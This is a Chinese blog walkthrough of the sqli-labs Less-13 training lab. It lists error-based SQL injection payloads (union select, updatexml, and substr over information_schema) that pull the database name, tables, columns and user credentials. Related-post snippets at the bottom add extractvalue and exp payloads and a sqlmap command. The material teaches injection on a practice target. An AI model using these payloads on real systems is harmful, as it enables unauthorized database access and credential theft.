【网络安全】sqli-labs Less-13 解题详析

原创已于 2024-12-31 13:18:55 修改 · 3.8k 阅读

2 ·

CC 4.0 BY-SA版权

原创文章，禁止转载，否则保留追究法律责任的权利。

文章标签：

#web安全 #数据库 #sql

于 2023-07-24 10:01:00 首次发布

Sqli-Labs靶场攻防实战专栏收录该内容

28 篇文章

订阅专栏

本文解析了sqli-labs Less-13关卡中SQL注入的具体步骤,包括判断注入类型、确定库名、表名、列名及字段值,展示了如何利用union select和updatexml进行数据提取。

文章目录

原理及姿势参考：【网络安全】SQL注入原理及常见攻击方法简析

Less-13与Less-12类似，具体原理不再赘述。

攻击姿势可参考本专栏Less-5：【网络安全】sqli-labs Less-5 解题详析

判断注入类型

输入1'，回显如下：

在这里插入图片描述
可知注入类型为单引号+括号注入

判断注入点个数

在这里插入图片描述
由上下两张图回显可知，注入点个数为2

在这里插入图片描述

查库名

1') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#

在这里插入图片描述

查表名

1') union select 1,updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#

在这里插入图片描述

查users表的列名

1') and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,31),0x7e),1)#

在这里插入图片描述

查字段

1') and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31),0x7e),1)#

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

秋说

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

Sqli-labs靶场第13关详解[Sqli-labs-less-13]

m0_73615178的博客

03-02

843

所以，payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句，然后为了使where语句条件成立，加上一个or 1=1 ，-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求，所以先使用burp进行抓包，然后将数据包存入txt文件中打包用-r 选择目标txt文件。当值为3时报错显示，所以列数为2，但是没有显示位，所以尝试报错注入。根据题目看，像一个登录页面，尝试使用布尔型盲注测试能否登录网站。

SQLi LABS Less-13 报错注入+布尔盲注

热门推荐

wangyuxiang946的博客

06-21

1万+

SQLi 第十三关，SQLi-LABS Less-13，SQLi-LABS Less 13，SQLiLABS Less13，SQLi Less 13

参与评论您还未登录，请先登录后发表或查看评论

sqli-labs less13

qq_45106794的博客

10-18

437

#sqli-labs less13 由于less12 和less 11 差不多，只是单引号变成 "）所以我们直接来解决less 13 对待less13 我们按老规矩判断其是数值型还是字符型。。。。。。然后我们发现他是’) 所以我们继续往下走 admin ’ order by n # 发现n=1 n=2 虽然没有想象中的回显，但是当n=3时，可以发现所以可以判断字段数为2 接下来试试adm...

网络安全-sqlmap实战之sqlilabs-Less13

关注网络安全、云原生安全

07-11

1298

类型双层-单引号及括号获取数据库 python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-13/" --forms --dbms mysql --answers="extending=N" --threads 8 -dbs --batch 发现参数结果 --forms参数还是比较快的，针对POST表单有三种方式，可以查看网络安全-sqlmap实战之sqlilabs-Less11中的小总结之后的获取表名，列名及内..

sqli-labs-13

qq_53030229的博客

05-10

413

文章目录一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码摸鱼中，最近不知道干什么ε=(´ο｀*)))唉一、抓包、判断注入点二、判断回显字段其实这里只有两个回显字段的，我这里使用3只是为了让你们方便看 uname=234')order by 3--+ 三、获取数据库 uname=234') and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 uname=234') and

精选资源

网络安全 - Web 安全靶场 - sqli-labs-php7.zip

10-13

该资源包来源于GitHub上的一个开源项目，由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip，用户可以搭建一个模拟的SQL注入环境，从而在不危害真实系统的前提下，进行各种SQL注入攻击和防御的练习...

phpstudy+靶场sqli-labs-master下载

11-08

【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全，尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...

sqli-labs-master.zip

01-18

Sqli-labs是一个在线的SQL注入练习平台，提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上，用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识，以便更好地应对现实世界中的网络攻击。

sqli-labs-master 靶场环境

最新发布

08-30

sqli-labs-master 靶场环境

精选资源

Sqli-labs-maste 靶场的下载， phpStudy 下载

09-13

在信息技术安全领域，SQL注入是常见的攻击手段，攻击者通过在Web应用的输入字段中插入恶意SQL语句，试图破坏...phpStudy和Sqli-labs-maste的结合使用，为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。

SqliLabs Less13-14

qq_45785324的博客

07-11

135

Sqli Labs less13 less14

LESS-13

qq_44598397的博客

03-21

446

LESS-13 源码：输入：admin’,出现错误提示，可以知道sql注入中是用’)闭合。输入：admin’)# 因为这里有报错，所以可以用报错注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布尔注入： admin’) and left(database(),1)>‘a’#（可以用二分法进...

sqli-labs通关（十三）

qq_65950075的博客

05-03

1098

报错原理：xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式，如果写入其他格式就会报错，并且会返回写入的非法格式内容，错误信息如：XPATH syntax error:'xxxxxxxx‘没有任何的返回信息，只有报错信息，那我们就用报错注入，让返回的报错信息包含我们的想要的信息。0x7e是~的意思，用concat拼接我们的sql语句，不符合xml文档的格式，就会报错，参数2：XPath_string(Xpath格式的字符串)，注入时可操作的地方。作用：改变文档中符合条件的节点的值。

sqli-labs（13）

jimggg的博客

03-20

301

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 通过报错可知是通过’) 闭合的发现没有登入成功返回信息，看来是要盲注了。方法一，报错型既然它返回错误信息了，说明有回显，可以报错注入。样例payload uname=admin') and extractvalue(1,conc...

sqli-labs (less-13)

kukudeshuo的博客

03-09

1431

sqli-labs (less-13) 进入13，输入用户名和密码登入，利用hackbar抓取POST请求，但是这里我们发现屏幕上这次没有数据回显了，这也说明我们这里不能再使用union注入了输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息通过报错信息我们知道闭合方式为’)，并且为字符型注入因为这里没有数据回显，但是我们观察到有完整的错误信息，所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注查看当前数据库

sqli - labs - 13 ~ 14

m0_62102000的博客

07-15

322

sqli - labs - 13 ~ 14

sqli-labs第十三关

yuqnqi的博客

05-09

622

第二个参数： xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是，它能够查询的字符串长度最大是32个字符，如果超过32位，我们就需要用函数来查询，比如right(),left()，substr()来截取字符串。构造语句，先用 ') 进行闭合，判断列数是多少，持续增加列数，直到返回正确的结果。判断注入点的闭合方式。

sqli-lab(13)

weixin_30664615的博客

05-24

177

Double Injection- String- with twist（双注入 - 字符型 - 变形）来进行我们的注入测试直接闭合，用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句，前面的单引号加括号和sql中的括号单引号闭合，后边的也闭合了，看图片：一切都是对的，为什么还是登录失败？因为username那儿变成空的了，所以前面随便加上一个用...

sql二次注入-sqli-labs第13关

weixin_46784800的博客

11-04

1103

获取数据操作判断所查询数据库中包含的列数采用post进行参数输入： uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序，发现无法对第三列进行排序，且报错Unknown column ‘3’ in ‘order clause’，则说明所查询数据库中共有两列数据。判断输出数据与数据库的联系输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示，则说明该网站为盲注，则

[网络安全]sqli-labs Less-1 解题详析

12-25

SQLi-Labs是网络安全领域的一个练习平台，Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中，你需要利用SQL注入技巧来获取数据库中的敏感信息，通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...